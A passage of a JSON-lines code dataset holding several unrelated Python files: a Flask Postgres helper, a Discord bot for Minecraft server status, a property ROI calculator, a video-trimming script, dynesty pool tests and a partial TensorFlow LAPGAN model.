str:\n results = self.iter(\n (lambda node, index: repr(node.value).ljust(value).replace(\"'\", '\"')),\n (lambda node, index: False)\n )\n result = str(results)\n return result.replace(\",\", \" |\").replace(\"[\", \"\").replace(\"]\", \"\")\n","repo_name":"eanorambuena/EQL","sub_path":"engine/row.py","file_name":"row.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"32312875650","text":"import os\nimport click\nfrom flask import current_app, g\nfrom flask.cli import with_appcontext\nimport psycopg2 as psql\n\n\ndef get_db():\n if 'db' not in g:\n # Get DB environment var\n DATABASE_URL = os.environ['DATABASE_URL']\n\n g.db = psql.connect(DATABASE_URL)\n\n return g.db\n\n\ndef close_db(e=None):\n db = g.pop('db', None)\n\n if db is not None:\n db.close()\n\n\ndef init_db():\n db = get_db()\n\n cur = db.cursor()\n\n with current_app.open_resource('postgresql_schema.sql') as sql:\n cur.execute(sql.read().decode('utf8'))\n db.commit()\n cur.close()\n\n\n@click.command('init-db')\n@with_appcontext\ndef init_db_command():\n \"\"\"Clear the existing data and create new tables.\"\"\"\n init_db()\n click.echo('Initialized the database.')\n\n\ndef init_app(app):\n app.teardown_appcontext(close_db)\n app.cli.add_command(init_db_command)\n","repo_name":"forgineer/bootstrap-budget","sub_path":"bootstrap/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73570014226","text":"import discord\nfrom discord.ext import commands\nfrom discord_slash import SlashCommand, SlashContext\nfrom discord_slash.utils.manage_commands import create_option\nimport mcstatus\nimport peewee as pw\nimport aioredis\n\nimport os\nimport asyncio\nimport logging\nimport time\nimport re\nimport base64\nimport io\nimport hashlib\nimport traceback\n\nimport migrations\n\nlogging.basicConfig(level=logging.INFO)\n\nDISCORD_TOKEN = os.getenv('DISCORD_TOKEN') or None\nURL_PREFIX = os.getenv('URL_PREFIX') or None\nif URL_PREFIX is None:\n logging.error(\"URL_PREFIX is unset! Server favicons will not be sent!\")\n\nbot = commands.Bot(command_prefix=\"!\")\nslash = SlashCommand(bot, sync_commands=True)\n\ndb = pw.SqliteDatabase('/config.db')\n\nmigrations.perform_migrations(db)\n\ndef file_hash(data):\n return hashlib.sha256(data).hexdigest()\n\nclass MyModel(pw.Model):\n class Meta:\n database = db\n\nclass Server(MyModel):\n ip = pw.CharField()\n port = pw.IntegerField()\n note = pw.CharField()\n guild = pw.BigIntegerField()\n command = pw.CharField()\n description = pw.CharField()\n channel_whitelist = pw.TextField(null=True)\n message_on_alien_detected = pw.TextField(null=True)\n\n class Meta:\n indexes = [\n (('ip', 'port',), False),\n (('guild', 'command',), True),\n ]\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n @property\n def markdown(self):\n return '`'+self.ip+'`:`'+str(self.port)+'`'\n\n @property\n def mcstatus(self):\n return mcstatus.MinecraftServer(self.ip, self.port)\n\n def channel_in_whitelist(self, channel):\n if self.channel_whitelist is None: return True\n if isinstance(channel, discord.abc.Snowflake):\n channel = channel.id\n channel = str(channel)\n return channel in self.channel_whitelist.split()\n\nclass PlayerID(MyModel):\n discord_id = pw.BigIntegerField(unique=True)\n minecraft_username = pw.CharField(unique=True)\n\n @classmethod\n def contains(cls, other):\n # this will probably be used in conjunction with resolve(), but because the expected data volume is low, we can rely on the database to cache the result.\n try:\n item = cls.resolve(other)\n return True\n except cls.DoesNotExist:\n return False\n\n @classmethod\n def resolve(cls, other):\n if isinstance(other, int):\n return cls.get(cls.discord_id==other).minecraft_username\n else:\n return cls.get(cls.minecraft_username==other).discord_id\n\ndb.create_tables([Server, PlayerID])\n\ndef get_pending_embed(server):\n return discord.Embed(description='Querying server at ' + server.markdown + ' for information...', colour=discord.Colour.blue()) \n\ndef get_ping_pending_query_embed(server, ping, query=None):\n emb = discord.Embed(title='Server status:', colour=discord.Colour.from_rgb(255, 255, 0))\n emb.add_field(name='Server IP', value=server.markdown)\n emb.add_field(name='Ping latency', value=str(round(ping.latency, 2))+' ms', inline=True)\n emb.add_field(name='Slots', value=str(ping.players.online)+' / '+str(ping.players.max), inline=True)\n emb.add_field(name='Information limited', value='Waiting for query result from server...' if query is None else 'Server did not respond to query request.')\n return emb\n\ndef get_error_embed(server):\n emb = discord.Embed(colour=discord.Colour.from_rgb(255, 0, 0))\n emb.description = 'Server did not respond to ping or query request. Is it offline or overloaded?'\n return emb\n\ndef get_query_result_embed(server, query=None, ping=None):\n data = {}\n aliens = []\n qfailed = False\n if query == False:\n qfailed = True\n \n if query:\n q = {'latency': query.latency}\n q.update(query.raw)\n qplayers = query.players.names\n query = q\n else:\n query = {}\n qplayers = []\n \n if ping:\n p = {'latency': ping.latency}\n p.update(ping.raw)\n ping = p\n else: ping = {}\n data['latency'] = max(query.get('latency') or 0, ping.get('latency') or 0)\n data['version'] = ping.get('version', {}).get('name') or query.get('software', {}).get('version')\n data['plugins'] = query.get('software', {}).get('plugins', [])\n data['favicon'] = ping.get('favicon')\n data['motd'] = ping.get('description') or query.get('hostname')\n data['modinfo'] = ping.get('modinfo') or ping.get('forgeData')\n data['slots-online'] = query.get('players', {}).get('online') or ping.get('players', {}).get('online')\n data['slots-max'] = query.get('players', {}).get('max') or ping.get('players', {}).get('max')\n data['players'] = qplayers or [x.get('name') for x in ping.get('players', {}).get('sample', [])]\n\n to_del = []\n for key in data:\n if not bool(data[key]): to_del.append(key)\n\n for key in to_del:\n if key == 'slots-online': continue\n del data[key]\n\n\n emb = discord.Embed(description='Server stats:', colour=discord.Colour.green()).add_field(name=\"Server IP\", value=server.markdown, inline=False)\n \n if 'latency' in data:\n emb.add_field(name='Request latency', value=str(round(data['latency'], 2))+' ms')\n\n if 'version' in data:\n emb.add_field(name='Server version', value=data['version'])\n\n if 'motd' in data:\n motd = data['motd']\n if isinstance(motd, dict) and list(motd) == ['text']: motd = motd['text']\n motd = str(motd)\n if len(motd)>1024: # cannot be longer than 1024 characters\n motd = motd[:1020] + '...'\n motd = re.sub('§.', '', motd) # remove all formatting characters\n emb.add_field(name='MOTD', value=motd)\n\n if 'slots-online' in data or 'slots-max' in data:\n emb.add_field(name='Slots', value=str(data.get('slots-online', '?'))+'/'+str(data.get('slots-max', '?')))\\\n\n if 'plugins' in data:\n emb.add_field(name='Plugins', value=data['plugins'], inline=False)\n\n if 'players' in data:\n player_list = ''\n for nick in data['players']:\n player_list += discord.utils.escape_markdown(nick)\n if PlayerID.contains(nick):\n player_list += ' (aka <@'+str(PlayerID.resolve(nick))+'>)'\n else:\n aliens.append(nick)\n player_list += '\\n'\n emb.add_field(name='Players', value=player_list)\n\n if not query or not ping:\n if qfailed: desc = 'Querying the server failed, is the query interface not enabled?'\n elif query == dict(): desc = 'Waiting for result of query...'\n elif ping == dict(): desc = 'Waiting for result of ping...'\n else: desc = 'Pinging the server failed. This should not happen. '+str({'query': query, 'ping': len(ping)})\n emb.add_field(name='Incomplete data', value=desc)\n emb.colour = discord.Colour.gold()\n\n if data.get('favicon'):\n res = re.match('data:image\\/(.*);base64,(.*)', data['favicon'])\n ext = res.group(1)\n imgdata = base64.b64decode(bytes(res.group(2), 'utf-8'))\n if URL_PREFIX:\n emb.set_thumbnail(url=URL_PREFIX+file_hash(imgdata)+'.'+ext)\n\n return emb, data.get('favicon'), aliens\n \n\ndef get_msg_embed(server, query=None, ping=None):\n favicon = None\n aliens = []\n if query is None and ping is None:\n emb = get_pending_embed(server)\n elif ping is False and not query:\n emb = get_error_embed(server)\n else:\n emb, favicon, aliens = get_query_result_embed(server, query=query, ping=ping)\n\n if server.note:\n emb = emb.add_field(name=\"Note\", value=server.note)\n return emb, favicon, aliens\n\ndef measure_latency(func):\n start = time.time()\n result = func()\n elapsed = time.time() - start\n result.latency = elapsed * 1000\n return result\n\n@slash.slash(name=\"status\",\n description=\"Fetch a Minecraft server's status.\",\n options=[\n create_option(name=\"ip\", description=\"The server's connection IP.\", option_type=3, required=True),\n create_option(name=\"port\", description=\"The server's connection port. Defaults to 25565.\", option_type=4, required=False)\n ])\nasync def send_status(ctx, ip, port=25565, note=None, msg_on_aliens=None):\n if ':' in ip:\n ip, port_line = ip.split(':')\n else: port_line = None\n port = int(port_line or port or 25565)\n server = Server(ip=ip, port=port)\n server.note = note\n sr = server.mcstatus\n \n await ctx.defer(hidden=False)\n \n ping = bot.loop.run_in_executor(None, sr.status)\n query = bot.loop.run_in_executor(None, measure_latency, sr.query)\n\n\n # favicons are returned by ping requests, so when one is completed we delete our message and resend it with attachment\n\n done, pending = await asyncio.wait([ping, query], return_when=asyncio.FIRST_COMPLETED)\n\n done, pending = await asyncio.wait([ping, query], return_when=asyncio.ALL_COMPLETED)\n\n try:\n ping_res = await ping\n except:\n ping_res = False\n\n try:\n query_res = await query\n except:\n query_res = False\n \n e,f,aliens = get_msg_embed(server, query=query_res, ping=ping_res)\n if f:\n res = re.match('data:image\\/(.*);base64,(.*)', f)\n ext = res.group(1)\n data = res.group(2)\n data = base64.b64decode(bytes(data, 'utf-8'))\n try:\n redis = await aioredis.create_redis('redis://redisserver')\n await redis.set(file_hash(data)+'.'+ext, data)\n #r = redis.Redis('redis://database')\n #r.set(file_hash(data)+'.'+ext, data)\n except:\n traceback.print_exc()\n e.thumbnail = discord.Empty\n\n msg = None\n if aliens and msg_on_aliens:\n aliens_list = ', '.join([discord.utils.escape_markdown(nick) for nick in aliens])\n msg = msg_on_aliens.format(aliens_list=aliens_list)\n msg = await ctx.send(content=msg, embed=e, allowed_mentions=discord.AllowedMentions.all())\n\n\ndef sync_guild_commands():\n for serv in Server.select().iterator():\n @slash.slash(name=serv.command, guild_ids=[serv.guild], description=serv.description, options=[])\n async def guild_command(ctx, ip=serv.ip, port=serv.port, note=serv.note, msg_on_aliens=serv.message_on_alien_detected, serv=serv):\n if serv.channel_in_whitelist(ctx.channel):\n await send_status.invoke(ctx, ip, port, note=note, msg_on_aliens=msg_on_aliens)\n else:\n await ctx.send(\"Sorry, you are not allowed to run this command in this channel. For more information, check this server's rules or contact an admin.\", hidden=True)\n\n\n@slash.slash(name=\"mcwho\",\n description=\"Identify a Discord user's Minecraft username.\",\n options=[\n create_option(name=\"user\", description=\"The user to lookup.\", option_type=6, required=True),\n ])\nasync def mcwho(ctx, user: discord.User):\n try:\n username = PlayerID.resolve(user.id)\n await ctx.send('User ' + user.mention + ' is associated with this Minecraft username: `'+username+'`.', allowed_mentions=discord.AllowedMentions.none())\n except PlayerID.DoesNotExist:\n await ctx.send('User ' + user.mention + ' is not associated with any Minecraft username.', allowed_mentions=discord.AllowedMentions.none())\n\n@slash.slash(name=\"discordwho\",\n description=\"Identify a Minecraft player's Discord account.\",\n options=[\n create_option(name=\"username\", description=\"The username to lookup.\", option_type=3, required=True),\n ])\nasync def discordwho(ctx, username):\n try:\n uid = PlayerID.resolve(username)\n await ctx.send('Minecraft username `'+username+'` is associated with this Discord user: <@'+str(uid)+'>.', allowed_mentions=discord.AllowedMentions.none())\n except PlayerID.DoesNotExist:\n await ctx.send('Minecraft username `'+username+'` is not associated with a Discord user.', allowed_mentions=discord.AllowedMentions.none())\n\nif __name__ == '__main__':\n sync_guild_commands()\n bot.run(DISCORD_TOKEN)\n","repo_name":"danya02/discord-minecraft-status","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73782036626","text":"class CalculateROI():\n\n\tdef __init__(self):\n\t\tself.income = 0\n\t\tself.expenses = 0\n\t\tself.investement = 0\n\t\tself.ROI = 0\n\n\tdef incomeInput(self):\n\t\tlaundry = input(\"How much money did you make from laundry? \")\n\t\trental = input(\"How much money did you make from your rental properties? \")\n\t\tstorage = input(\"How much money did you make from storage? \")\n\t\tmisc = input(\"How much money did you make from misc items? \")\n\t\tself.income = int(laundry) + int(rental) + int(storage) + int(misc) \n\n\tdef expenseInput(self):\n\t\ttaxes = input(\"How much did you spend on taxes? \")\n\t\tinsurance = input(\"How much did you spend on insurance? \")\n\t\telectric = input(\"How much did you spend on electric? \")\n\t\twater = input(\"How much did you spend on water? \")\n\t\tsewer = input(\"How much did you spend on sewer? \")\n\t\ttrash = input(\"How much did you spend on trash? \")\n\t\tgas = input(\"How much did you spend on gas? \")\n\t\tHOA = input(\"How much did you spend on HOA? \")\n\t\tlandscape = input(\"How much did you spend on landscape? \")\n\t\tvacancy = input(\"How much did you spend on vacancy? \")\n\t\trepairs = input(\"How much did you spend on repairs? \")\n\t\tCapEx = input(\"How much did you spend on CapEx? \")\n\t\tmortgage = input(\"How much did you spend on mortgage? \")\n\t\tprop_mgmt = input(\"How much did you spend on property management? \")\n\t\tself.expenses = int(taxes) + int(insurance) + int(electric) + int(water) + int(sewer) + int(trash) + int(gas) + int(HOA) + int(landscape) + int(vacancy) + int(repairs) + int(CapEx) + int(mortgage) + int(prop_mgmt)\n\n\n\tdef investmentInput(self):\n\t\tdown = input(\"How much did you spend on your down payment? \")\n\t\tclosing = input(\"How much did you spend on closing costs? \")\n\t\trehab = input(\"How much is your rehab budget? \")\n\t\tmisc = input(\"How much did you spend on misc investment items? \")\n\t\tself.investement = int(down) + int(closing) + int(rehab) + int(misc)\n\t\t\n\tdef cashFlowInput(self):\n\t\tmonthlyCashFlow = self.income - self.expenses\n\t\tannualCashFlow = monthlyCashFlow * 12\n\t\tprint(f\"Your monthly cash flow is {monthlyCashFlow}.\")\n\t\tprint(f\"Your annual cash flow is {annualCashFlow}.\")\n\t\t\n\tdef finalROI(self):\n\t\tmonthlyCashFlow = self.income - self.expenses\n\t\tannualCashFlow = monthlyCashFlow * 12\n\t\tROI = annualCashFlow / self.investement\n\t\tself.ROI += float(ROI*100)\n\t\tprint(f\"Your ROI is {self.ROI}%\")\n\n\nmyROI = CalculateROI()\n\ndef UserInput():\n\twhile True:\n\t\tresponse = input(\"What would you like to input? Income/Expense/Investment/Show/Quit \")\n\t\tif response.lower() == \"income\":\n\t\t\tmyROI.incomeInput()\n\t\telif response.lower() == 'expense':\n\t\t\tmyROI.expenseInput()\n\t\telif response == 'investment':\n\t\t\tmyROI.investmentInput() \n\t\telif response.lower() == \"show\":\n\t\t\tprint('You are all done!')\n\t\t\tmyROI.cashFlowInput()\n\t\t\tmyROI.finalROI()\n\t\telif response.lower() == 'quit':\n\t\t\tprint(\"Thank you, come again!\")\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"Invalid input, please try again.\")\n\n\nUserInput() ","repo_name":"coderklee/ROI_Calculator","sub_path":"ROI_Calculator.py","file_name":"ROI_Calculator.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1640852745","text":"import numpy as np\nimport cv2\nimport pandas as pd\nimport os\nfrom tqdm import tqdm\nimport math\n\n\n# the code for trimming a single video\ndef trim_vid(vid_path,output_vid,start,end):\n # define some video property \n cap = cv2.VideoCapture(vid_path)\n fps = cap.get(cv2.CAP_PROP_FPS)\n frame_width = int(cap.get(3))\n frame_height = int(cap.get(4))\n frame_num = int(cap.get(7))\n\n # calculate the frame to start and end \n start_frame = math.ceil(start * fps)\n end_frame = math.ceil(end * fps)\n\n # define out put video\n out = cv2.VideoWriter(output_vid,cv2.VideoWriter_fourcc(*'MJPG'), 30,\n (frame_width,frame_height))\n\n # set the video to start frame\n cap.set(1,start_frame)\n\n # load and save the frames\n for i in range(end_frame-start_frame):\n\n ret, frame = cap.read()\n if ret == True: \n out.write(frame)\n\n cap.release()\n out.release()\n\n cv2.destroyAllWindows()\n\n\n# main function for batch video trimming based on collected \"data_trim.csv\"\ndef trim_videos(df, trim_vid_dir=\"data/test_del\"):\n for index, row in tqdm(df.iterrows(),desc=\"Trimming videos... slow... please wait\"):\n # Please make sure column name is corrects(without extra space)\n vid_path = row.get(\"Video_Path\")\n vid_path = vid_path.replace('\"','')\n # get time stamp for FW and BW gait \n FW_Start, FW_End = row.get(\"FW_Start\"), row.get(\"FW_End\")\n BW_Start, BW_End = row.get(\"BW_Start\"), row.get(\"BW_End\")\n # define some output directories and video_name\n # get the current path and concat with the target path for trimmed videos\n data_dir = os.path.join(os.getcwd(), trim_vid_dir)\n # make folder for each subject\n subject_dir = os.path.join(data_dir, vid_path.split(\"\\\\\")[4])\n # try to make folder \n try:\n os.makedirs(subject_dir)\n # if already exist stop creating and continue\n except:\n pass\n # print if any video is in .MTS format\n if vid_path.endswith(\".MTS\"):\n print(vid_path)\n continue\n\n # double check that all data points' time stamp is valid\n if not pd.isnull(FW_Start) and not pd.isnull(FW_End):\n output_vid = os.path.join(subject_dir, row[\"Time\"]+\"_\"+row.get(\"ON or OFF\")+\"_\"+\"FW_\"+row[\"R1 or R2\"]+\"_\"+str(FW_Start)+\"_.avi\")\n if not os.path.exists(output_vid):\n trim_vid(vid_path,output_vid,FW_Start,FW_End)\n \n # double check that all data points' time stamp is valid\n if not pd.isnull(BW_Start) and not pd.isnull(BW_End):\n output_vid = os.path.join(subject_dir, row[\"Time\"]+\"_\"+row.get(\"ON or OFF\")+\"_\"+\"BW_\"+row[\"R1 or R2\"]+\"_\"+str(BW_Start)+\"_.avi\")\n if not os.path.exists(output_vid):\n trim_vid(vid_path,output_vid,BW_Start,BW_End)\n\nif __name__ == '__main__':\n # please replace with your own path\n trim_csv =r\"C:\\Users\\jingy\\Parkinson\\Codes\\csv\\data_trim.csv\"\n df= pd.read_csv(trim_csv)\n # please replace this path\n trim_videos(df, trim_vid_dir=\"data/test_del\")\n","repo_name":"jingyuanchan/Parkinson","sub_path":"multi_video_trim.py","file_name":"multi_video_trim.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44253583903","text":"import numpy as np\nimport pytest\nimport dynesty\nimport multiprocessing as mp\nimport dynesty.pool as dypool\nfrom utils import get_rstate, get_printing\n\"\"\"\nRun a series of basic tests to check whether anything huge is broken.\n\n\"\"\"\n\nnlive = 1000\nprinting = get_printing()\n\nndim = 2\ngau_s = 0.01\n\n\ndef loglike_gau(x):\n return (-0.5 * np.log(2 * np.pi) * ndim - np.log(gau_s) * ndim -\n 0.5 * np.sum((x - 0.5)**2) / gau_s**2)\n\n\ndef prior_transform_gau(x):\n return x\n\n\n# EGGBOX\n# see 1306.2144\ndef loglike_egg(x):\n logl = ((2 + np.cos(x[0] / 2) * np.cos(x[1] / 2))**5)\n return logl\n\n\ndef prior_transform_egg(x):\n return x * 10 * np.pi\n\n\nLOGZ_TRUTH_GAU = 0\nLOGZ_TRUTH_EGG = 235.856\n\n\ndef terminator(pool):\n # Because of https://github.com/nedbat/coveragepy/issues/1310\n # I have to close join and can't fully rely on contexts that\n # do send SIGTERMS\n pool.close()\n pool.join()\n\n\ndef test_pool():\n # test pool on egg problem\n rstate = get_rstate()\n\n # i specify large queue_size here, otherwise it is too slow\n with dypool.Pool(2, loglike_egg, prior_transform_egg) as pool:\n sampler = dynesty.NestedSampler(pool.loglike,\n pool.prior_transform,\n ndim,\n nlive=nlive,\n pool=pool,\n queue_size=100,\n rstate=rstate)\n sampler.run_nested(dlogz=0.1, print_progress=printing)\n\n assert (abs(LOGZ_TRUTH_EGG - sampler.results['logz'][-1])\n < 5. * sampler.results['logzerr'][-1])\n terminator(pool)\n\n\ndef test_pool_x():\n # check without specifying queue_size\n rstate = get_rstate()\n\n with dypool.Pool(2, loglike_egg, prior_transform_egg) as pool:\n sampler = dynesty.NestedSampler(pool.loglike,\n pool.prior_transform,\n ndim,\n nlive=50,\n pool=pool,\n rstate=rstate)\n sampler.run_nested(print_progress=printing, maxiter=100)\n # not checking the results since I'm interrupting\n terminator(pool)\n\n\ndef test_pool_dynamic():\n # test pool on gau problem\n # i specify large queue_size here, otherwise it is too slow\n rstate = get_rstate()\n\n with dypool.Pool(2, loglike_gau, prior_transform_gau) as pool:\n sampler = dynesty.DynamicNestedSampler(pool.loglike,\n pool.prior_transform,\n ndim,\n nlive=nlive,\n pool=pool,\n queue_size=100,\n rstate=rstate)\n sampler.run_nested(dlogz_init=1, print_progress=printing)\n\n assert (abs(LOGZ_TRUTH_GAU - sampler.results['logz'][-1])\n < 5. * sampler.results['logzerr'][-1])\n terminator(pool)\n\n\ndef loglike_gau_args(x, y, z=None):\n return (-0.5 * np.log(2 * np.pi) * ndim - np.log(gau_s) * ndim -\n 0.5 * np.sum((x - 0.5)**2) / gau_s**2) + y + z\n\n\ndef prior_transform_gau_args(x, y, z=None):\n return x + y + z\n\n\ndef test_pool_args():\n # test pool on gau problem\n # i specify large queue_size here, otherwise it is too slow\n rstate = get_rstate()\n\n with dypool.Pool(2,\n loglike_gau_args,\n prior_transform_gau_args,\n logl_args=(0, ),\n ptform_args=(0, ),\n logl_kwargs=dict(z=0),\n ptform_kwargs=dict(z=0)) as pool:\n sampler = dynesty.DynamicNestedSampler(pool.loglike,\n pool.prior_transform,\n ndim,\n nlive=nlive,\n pool=pool,\n queue_size=100,\n rstate=rstate)\n sampler.run_nested(maxiter=300, print_progress=printing)\n\n assert (abs(LOGZ_TRUTH_GAU - sampler.results['logz'][-1])\n < 5. * sampler.results['logzerr'][-1])\n\n # to ensure we get coverage\n terminator(pool)\n\n\n@pytest.mark.parametrize('sample', ['slice', 'rwalk', 'rslice'])\ndef test_pool_samplers(sample):\n # this is to test how the samplers are dealing with queue_size>1\n rstate = get_rstate()\n\n with mp.Pool(2) as pool:\n sampler = dynesty.NestedSampler(loglike_gau,\n prior_transform_gau,\n ndim,\n nlive=nlive,\n sample=sample,\n pool=pool,\n queue_size=100,\n rstate=rstate)\n sampler.run_nested(print_progress=printing)\n assert (abs(LOGZ_TRUTH_GAU - sampler.results['logz'][-1])\n < 5. * sampler.results['logzerr'][-1])\n terminator(pool)\n\n\nPOOL_KW = ['prior_transform', 'loglikelihood', 'propose_point', 'update_bound']\n\n\n@pytest.mark.parametrize('func', POOL_KW)\ndef test_usepool(func):\n # test all the use_pool options, toggle them one by one\n rstate = get_rstate()\n use_pool = {}\n for k in POOL_KW:\n use_pool[k] = False\n use_pool[func] = True\n\n with mp.Pool(2) as pool:\n sampler = dynesty.DynamicNestedSampler(loglike_gau,\n prior_transform_gau,\n ndim,\n nlive=nlive,\n rstate=rstate,\n use_pool=use_pool,\n pool=pool,\n queue_size=100)\n sampler.run_nested(maxiter=10000, print_progress=printing)\n terminator(pool)\n","repo_name":"joshspeagle/dynesty","sub_path":"tests/test_pool.py","file_name":"test_pool.py","file_ext":"py","file_size_in_byte":6319,"program_lang":"python","lang":"en","doc_type":"code","stars":319,"dataset":"github-code","pt":"48"} +{"seq_id":"3543204606","text":"import tensorflow as tf\n\n\ntf.set_random_seed(777)\n\n\ndef conv2d(input_, filter_=64, k=5, s=1, activation=tf.nn.leaky_relu, pad='same', name=\"conv2d\"):\n with tf.variable_scope(name):\n return tf.layers.conv2d(inputs=input_,\n filters=filter_,\n kernel_size=k,\n strides=s,\n padding=pad,\n activation=activation,\n kernel_initializer=tf.contrib.layers.variance_scaling_initializer(),\n bias_initializer=tf.constant_initializer(0.),\n name=name)\n\n\n# In image_utils, up/down_sampling\ndef image_sampling(img, sampling_type='down'):\n shape = img.get_shape() # [batch, height, width, channels]\n\n if sampling_type == 'down':\n h = int(shape[1] // 2)\n w = int(shape[2] // 2)\n else: # 'up'\n h = int(shape[1] * 2)\n w = int(shape[2] * 2)\n\n return tf.image.resize_images(img, [h, w], tf.image.ResizeMethod.BILINEAR)\n\n\nclass LAPGAN:\n\n def __init__(self, s, batch_size=128, input_height=32, input_width=32, input_channel=3, n_classes=10,\n sample_num=10 * 10, sample_size=10,\n z_dim=100, gf_dim=64, df_dim=64, fc_unit=512):\n\n \"\"\"\n # General Settings\n :param s: TF Session\n :param batch_size: training batch size, default 128\n :param input_height: input image height, default 64\n :param input_width: input image width, default 64\n :param input_channel: input image channel, default 3 (RGB)\n :param n_classes: the number of classes, default 10\n - in case of CIFAR, image size is 32x32x3(HWC), classes are 10.\n\n # Output Settings\n :param sample_size: sample image size, default 8\n :param sample_num: the number of sample images, default 64\n\n # Model Settings\n :param z_dim: z noise dimension, default 100\n :param gf_dim: the number of generator filters, default 64\n :param df_dim: the number of discriminator filters, default 64\n :param fc_unit: the number of fully connected filters, default 512\n \"\"\"\n\n self.s = s\n self.batch_size = batch_size\n self.input_height = input_height\n self.input_width = input_width\n self.input_channel = input_channel\n self.n_classes = n_classes\n\n self.sample_size = sample_size\n self.sample_num = sample_num\n\n self.image_shape = [self.input_height, self.input_width, self.input_channel]\n\n self.z_dim = z_dim\n\n self.gf_dim = gf_dim\n self.df_dim = df_dim\n self.fc_unit = fc_unit\n\n # Placeholders\n self.y = tf.placeholder(tf.float32, shape=[None, self.n_classes], name='y-classes') # one_hot\n\n self.x1_fine = tf.placeholder(tf.float32,\n shape=[None, self.input_height, self.input_width, self.input_channel],\n name='x-images')\n self.x1_scaled = image_sampling(self.x1_fine, 'down')\n self.x1_coarse = image_sampling(self.x1_scaled, 'up')\n self.x1_diff = self.x1_fine - self.x1_coarse\n\n self.x2_fine = self.x1_scaled # [16, 16]\n self.x2_scaled = image_sampling(self.x2_fine, 'down')\n self.x2_coarse = image_sampling(self.x2_scaled, 'up')\n self.x2_diff = self.x2_fine - self.x2_coarse\n\n self.x3_fine = self.x2_scaled # [8, 8]\n\n self.z = []\n self.z_noises = [32 * 32, 16 * 16, self.z_dim]\n for i in range(3):\n self.z.append(tf.placeholder(tf.float32,\n shape=[None, self.z_noises[i]],\n name='z-noise_{0}'.format(i)))\n\n self.g = [] # generators\n self.g_loss = [] # generator losses\n\n self.d_reals = [] # discriminator_real logit\n self.d_fakes = [] # discriminator_fake logit\n self.d_reals_prob = [] # discriminator_real prob\n self.d_fakes_prob = [] # discriminator_fake prob\n self.d_loss = [] # discriminator_real losses\n\n # Training Options\n self.d_op = []\n self.g_op = []\n\n self.beta1 = 0.5\n self.beta2 = 0.9\n self.learning_rate = 8e-4\n self.lr = tf.train.exponential_decay(\n learning_rate=self.learning_rate,\n decay_rate=0.9,\n decay_steps=150,\n global_step=750,\n staircase=False,\n )\n\n self.saver = None\n self.merged = None\n self.writer = None\n\n self.bulid_lapgan() # build LAPGAN model\n\n def discriminator(self, x1, x2, y, scale=32, reuse=None):\n \"\"\"\n :param x1: image to discriminate\n :param x2: down-up sampling-ed images\n :param y: classes\n :param scale: image size\n :param reuse: variable re-use\n :return: logits\n \"\"\"\n\n assert (scale % 8 == 0) # 32, 16, 8\n\n with tf.variable_scope('discriminator_{0}'.format(scale), reuse=reuse):\n if scale == 8:\n x1 = tf.reshape(x1, [-1, scale * scale * 3])\n\n h = tf.concat([x1, y], axis=1)\n\n h = tf.layers.dense(h, self.fc_unit, activation=tf.nn.leaky_relu, name='d-fc-1')\n h = tf.layers.dropout(h, 0.5, name='d-dropout-1')\n h = tf.layers.dense(h, self.fc_unit // 2, activation=tf.nn.leaky_relu, name='d-fc-2')\n h = tf.layers.dropout(h, 0.5, name='d-dropout-2')\n h = tf.layers.dense(h, 1, name='d-fc-3')\n else:\n x = x1 + x2\n\n y = tf.layers.dense(y, scale * scale, activation=tf.nn.leaky_relu, name='d-fc-1')\n y = tf.reshape(y, [-1, scale, scale, 1])\n\n h = tf.concat([x, y], axis=3)\n\n h = conv2d(h, filter_=self.df_dim, pad='valid', name='d-conv-1')\n h = conv2d(h, filter_=self.df_dim, activation=None, pad='valid', name='d-conv-2')\n\n h = tf.layers.flatten(h)\n h = tf.nn.leaky_relu(h)\n h = tf.layers.dropout(h, 0.5, name='d-dropout-1')\n\n h = tf.layers.dense(h, 1, name='d-fc-2')\n\n return h\n\n def generator(self, x, y, z, scale=32, reuse=None):\n \"\"\"\n :param x: images to fake\n :param y: classes\n :param z: noise\n :param scale: image size\n :param reuse: variable re-use\n :return: logits\n \"\"\"\n\n assert(scale % 8 == 0) # 32, 16, 8\n\n with tf.variable_scope('generator_{0}'.format(scale), reuse=reuse):\n if scale == 8:\n h = tf.concat([z, y], axis=1)\n\n # FC Layers\n h = tf.layers.dense(h, self.fc_unit, activation=tf.nn.leaky_relu, name='g-fc-1')\n h = tf.layers.dropout(h, 0.5, name='g-dropout-1')\n h = tf.layers.dense(h, self.fc_unit // 2, activation=tf.nn.leaky_relu, name='g-fc-2')\n h = tf.layers.dropout(h, 0.5, name='g-dropout-2')\n h = tf.layers.dense(h, 3 * 8 * 8, name='g-fc-3')\n\n h = tf.reshape(h, [-1, 8, 8, 3])\n else:\n y = tf.layers.dense(y, scale * scale, name='g-fc-0')\n y = tf.reshape(y, [-1, scale, scale, 1])\n z = tf.reshape(z, [-1, scale, scale, 1])\n\n h = tf.concat([z, y, x], axis=3) # concat into 5 dims\n\n # Convolution Layers\n for idx in range(1, scale // 8 - 1):\n h = conv2d(h, filter_=self.gf_dim, name='g-deconv-{0}'.format(idx))\n\n h = conv2d(h, filter_=3, activation=None, name='g-deconv-{0}'.format(scale // 8))\n\n return h\n\n def bulid_lapgan(self):\n def sce_loss(x, y):\n return tf.nn.sigmoid_cross_entropy_with_logits(logits=x, labels=y)\n\n # Generator & Discriminator\n g1 = self.generator(x=self.x1_coarse, y=self.y, z=self.z[0], scale=32)\n d1_fake = self.discriminator(x1=g1, x2=self.x1_coarse, y=self.y, scale=32)\n d1_real = self.discriminator(x1=self.x1_diff, x2=self.x1_coarse, y=self.y, scale=32, reuse=True)\n\n g2 = self.generator(x=self.x2_coarse, y=self.y, z=self.z[1], scale=16)\n d2_fake = self.discriminator(x1=g2, x2=self.x2_coarse, y=self.y, scale=16)\n d2_real = 